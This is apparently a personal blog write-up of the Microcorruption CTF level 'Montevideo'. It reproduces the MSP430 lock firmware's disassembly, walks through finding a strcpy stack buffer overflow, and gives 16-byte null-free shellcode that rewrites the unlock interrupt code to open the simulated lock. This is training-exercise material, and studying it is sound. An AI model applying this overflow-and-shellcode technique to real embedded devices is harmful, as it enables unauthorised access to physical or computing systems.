Microcorruption CTF Montevideo Write-up

Microcorruption CTF Montevideo Write-up

- 8 mins


This is a write-up of my solution to the Microcorruption CTF challenge “Montevideo” (LOCKIT PRO r c.03).

In the manual, they claim to have increased their security practices:

    - Lockitall developers  have rewritten the code  to conform to the
      internal secure development process.
    - This lock is attached the the LockIT Pro HSM-2.

We’ll see about that :wink:. Let’s take a look at the code.

0010 <__trap_interrupt>
0010: 3041 ret
4400 <__init_stack>
4400: 3140 0044 mov #0x4400, sp
4404 <__low_level_init>
4404: 1542 5c01 mov &0x015c, r5
4408: 75f3 and.b #-0x1, r5
440a: 35d0 085a bis #0x5a08, r5
440e <__do_copy_data>
440e: 3f40 0000 clr r15
4412: 0f93 tst r15
4414: 0724 jz #0x4424 <__do_clear_bss+0x0>
4416: 8245 5c01 mov r5, &0x015c
441a: 2f83 decd r15
441c: 9f4f 5846 0024 mov 0x4658(r15), 0x2400(r15)
4422: f923 jnz #0x4416 <__do_copy_data+0x8>
4424 <__do_clear_bss>
4424: 3f40 6400 mov #0x64, r15
4428: 0f93 tst r15
442a: 0624 jz #0x4438 <main+0x0>
442c: 8245 5c01 mov r5, &0x015c
4430: 1f83 dec r15
4432: cf43 0024 mov.b #0x0, 0x2400(r15)
4436: fa23 jnz #0x442c <__do_clear_bss+0x8>
4438 <main>
4438: b012 f444 call #0x44f4 <login>
443c <__stop_progExec__>
443c: 32d0 f000 bis #0xf0, sr
4440: fd3f jmp #0x443c <__stop_progExec__+0x0>
4442 <__ctors_end>
4442: 3040 5646 br #0x4656 <_unexpected_>
4446 <conditional_unlock_door>
4446: 0412 push r4
4448: 0441 mov sp, r4
444a: 2453 incd r4
444c: 2183 decd sp
444e: c443 fcff mov.b #0x0, -0x4(r4)
4452: 3e40 fcff mov #0xfffc, r14
4456: 0e54 add r4, r14
4458: 0e12 push r14
445a: 0f12 push r15
445c: 3012 7e00 push #0x7e
4460: b012 4c45 call #0x454c <INT>
4464: 5f44 fcff mov.b -0x4(r4), r15
4468: 8f11 sxt r15
446a: 3152 add #0x8, sp
446c: 3441 pop r4
446e: 3041 ret
4470 .strings:
4470: "Enter the password to continue."
4490: "Remember: passwords are between 8 and 16 characters."
44c5: "Access granted."
44d5: "That password is not correct."
44f3: ""
44f4 <login>
44f4: 3150 f0ff add #0xfff0, sp
44f8: 3f40 7044 mov #0x4470 "Enter the password to continue.", r15
44fc: b012 b045 call #0x45b0 <puts>
4500: 3f40 9044 mov #0x4490 "Remember: passwords are between 8 and 16 characters.", r15
4504: b012 b045 call #0x45b0 <puts>
4508: 3e40 3000 mov #0x30, r14
450c: 3f40 0024 mov #0x2400, r15
4510: b012 a045 call #0x45a0 <getsn>
4514: 3e40 0024 mov #0x2400, r14
4518: 0f41 mov sp, r15
451a: b012 dc45 call #0x45dc <strcpy>
451e: 3d40 6400 mov #0x64, r13
4522: 0e43 clr r14
4524: 3f40 0024 mov #0x2400, r15
4528: b012 f045 call #0x45f0 <memset>
452c: 0f41 mov sp, r15
452e: b012 4644 call #0x4446 <conditional_unlock_door>
4532: 0f93 tst r15
4534: 0324 jz #0x453c <login+0x48>
4536: 3f40 c544 mov #0x44c5 "Access granted.", r15
453a: 023c jmp #0x4540 <login+0x4c>
453c: 3f40 d544 mov #0x44d5 "That password is not correct.", r15
4540: b012 b045 call #0x45b0 <puts>
4544: 3150 1000 add #0x10, sp
4548: 3041 ret
454a <__do_nothing>
454a: 3041 ret
454c <INT>
454c: 1e41 0200 mov 0x2(sp), r14
4550: 0212 push sr
4552: 0f4e mov r14, r15
4554: 8f10 swpb r15
4556: 024f mov r15, sr
4558: 32d0 0080 bis #0x8000, sr
455c: b012 1000 call #0x10
4560: 3241 pop sr
4562: 3041 ret
4564 <putchar>
4564: 2183 decd sp
4566: 0f12 push r15
4568: 0312 push #0x0
456a: 814f 0400 mov r15, 0x4(sp)
456e: b012 4c45 call #0x454c <INT>
4572: 1f41 0400 mov 0x4(sp), r15
4576: 3150 0600 add #0x6, sp
457a: 3041 ret
457c <getchar>
457c: 0412 push r4
457e: 0441 mov sp, r4
4580: 2453 incd r4
4582: 2183 decd sp
4584: 3f40 fcff mov #0xfffc, r15
4588: 0f54 add r4, r15
458a: 0f12 push r15
458c: 1312 push #0x1
458e: b012 4c45 call #0x454c <INT>
4592: 5f44 fcff mov.b -0x4(r4), r15
4596: 8f11 sxt r15
4598: 3150 0600 add #0x6, sp
459c: 3441 pop r4
459e: 3041 ret
45a0 <getsn>
45a0: 0e12 push r14
45a2: 0f12 push r15
45a4: 2312 push #0x2
45a6: b012 4c45 call #0x454c <INT>
45aa: 3150 0600 add #0x6, sp
45ae: 3041 ret
45b0 <puts>
45b0: 0b12 push r11
45b2: 0b4f mov r15, r11
45b4: 073c jmp #0x45c4 <puts+0x14>
45b6: 1b53 inc r11
45b8: 8f11 sxt r15
45ba: 0f12 push r15
45bc: 0312 push #0x0
45be: b012 4c45 call #0x454c <INT>
45c2: 2152 add #0x4, sp
45c4: 6f4b mov.b @r11, r15
45c6: 4f93 tst.b r15
45c8: f623 jnz #0x45b6 <puts+0x6>
45ca: 3012 0a00 push #0xa
45ce: 0312 push #0x0
45d0: b012 4c45 call #0x454c <INT>
45d4: 2152 add #0x4, sp
45d6: 0f43 clr r15
45d8: 3b41 pop r11
45da: 3041 ret
45dc <strcpy>
45dc: 0d4f mov r15, r13
45de: 023c jmp #0x45e4 <strcpy+0x8>
45e0: 1e53 inc r14
45e2: 1d53 inc r13
45e4: 6c4e mov.b @r14, r12
45e6: cd4c 0000 mov.b r12, 0x0(r13)
45ea: 4c93 tst.b r12
45ec: f923 jnz #0x45e0 <strcpy+0x4>
45ee: 3041 ret
45f0 <memset>
45f0: 0b12 push r11
45f2: 0a12 push r10
45f4: 0912 push r9
45f6: 0812 push r8
45f8: 0b4f mov r15, r11
45fa: 3d90 0600 cmp #0x6, r13
45fe: 082c jc #0x4610 <memset+0x20>
4600: 043c jmp #0x460a <memset+0x1a>
4602: cb4e 0000 mov.b r14, 0x0(r11)
4606: 1b53 inc r11
4608: 3d53 add #-0x1, r13
460a: 0d93 tst r13
460c: fa23 jnz #0x4602 <memset+0x12>
460e: 1e3c jmp #0x464c <memset+0x5c>
4610: 4a4e mov.b r14, r10
4612: 0a93 tst r10
4614: 0324 jz #0x461c <memset+0x2c>
4616: 0c4a mov r10, r12
4618: 8c10 swpb r12
461a: 0adc bis r12, r10
461c: 1fb3 bit #0x1, r15
461e: 0524 jz #0x462a <memset+0x3a>
4620: 3d53 add #-0x1, r13
4622: cf4e 0000 mov.b r14, 0x0(r15)
4626: 0b4f mov r15, r11
4628: 1b53 inc r11
462a: 0c4d mov r13, r12
462c: 12c3 clrc
462e: 0c10 rrc r12
4630: 084b mov r11, r8
4632: 094c mov r12, r9
4634: 884a 0000 mov r10, 0x0(r8)
4638: 2853 incd r8
463a: 3953 add #-0x1, r9
463c: fb23 jnz #0x4634 <memset+0x44>
463e: 0c5c add r12, r12
4640: 0c5b add r11, r12
4642: 1df3 and #0x1, r13
4644: 0d99 cmp r9, r13
4646: 0224 jeq #0x464c <memset+0x5c>
4648: cc4e 0000 mov.b r14, 0x0(r12)
464c: 3841 pop r8
464e: 3941 pop r9
4650: 3a41 pop r10
4652: 3b41 pop r11
4654: 3041 ret
4656 <_unexpected_>
4656: 0013 reti pc

Looking at the main() function, we can see that a single function named login() is called. Inside of login(), we see that after a password prompt, a call to strcpy() is made. The password prompt itself, “Remember: passwords are between 8 and 16 characters.”, implies that there’s some sort of length checking in place. Let’s play around in the debugger and see if this is actually the case.

After setting breakpoints before and after the call to strcpy(), we run the program and enter AAAAAAAAAA as the input. We keep an eye the address pointed to by the stackpointer (sp == 43ee) and watch the function place our input onto the stack.

Pay close attention to the bytes soon after our input ends: 3c44. If you stepped through the program from the beginning, you’ll notice that this value on the stack is actually the return address (443c) that was pushed as a result of the call to login() from main() originally! Let’s try overwriting these bytes (which are at offset 17 and 18), and see if we can control the program counter…

We try the input BBBBBBBBBBBBBBBBAA and watch the memory address containing the return address get overwritten. After continuing execution past the second breakpoint, we see the program crash and pc contain 4141! :feelsgood:

Now that we’ve confirmed a stack buffer overflow vulnerability exists, we need to find a way exploit it. In classical buffer overflow exploit examples, the payload (usually shellcode) is stuffed at the beginning of the buffer that we’re overflowing. Then, the return address is overwritten so that it points back to the start of our buffer. When the executing function returns, the address of the buffer is popped into the program counter and our payload gets executed. If we were to try something similar here, that means we’d have to stuff our payload into 16 bytes (because the 17th and 18th byte map to the return address on the stack). That’s not that much room :thinking:. Oh and don’t forget, if the payload includes any null bytes, strcpy() won’t copy the entire input to the stack :worried:.

Since this program contains the familiar conditional_unlock_door() function which pushes (a useless) 0x7e to the stack before calling the interrupt, I decided to write shellcode that will overwrite the 0x7e with 0x7f (the code to unlock the door).

After some careful trial and error with the assembler, I meticulously wrote the following code:

mov   #0x7f01, r12    # load 0x7f01 into r12
add   #-0x1, r12      # subtract 0x01 from r12 (resulting in 0x7f00)
swpb  r12             # swap the two bytes (resulting in 0x007f)
mov   r12, 0x445e(r6) # write 0x007f into 0x445e
call  #0x4446         # call to conditional_unlock_door()

My shellcode will essentially put the value of 0x7f into register r12 (by performing some byte manipulations in order to avoid null-bytes in my payload), and will then replace the 0x7e in conditional_unlock_door() with 0x7f. After the overwrite happens, a call to conditional_unlock_door() is made…

Montevideo Solve

Great Success! :boom:


Note that the shellcode is exactly 16 bytes :sweat_smile:



Security guy, busticati, professional button-pusher

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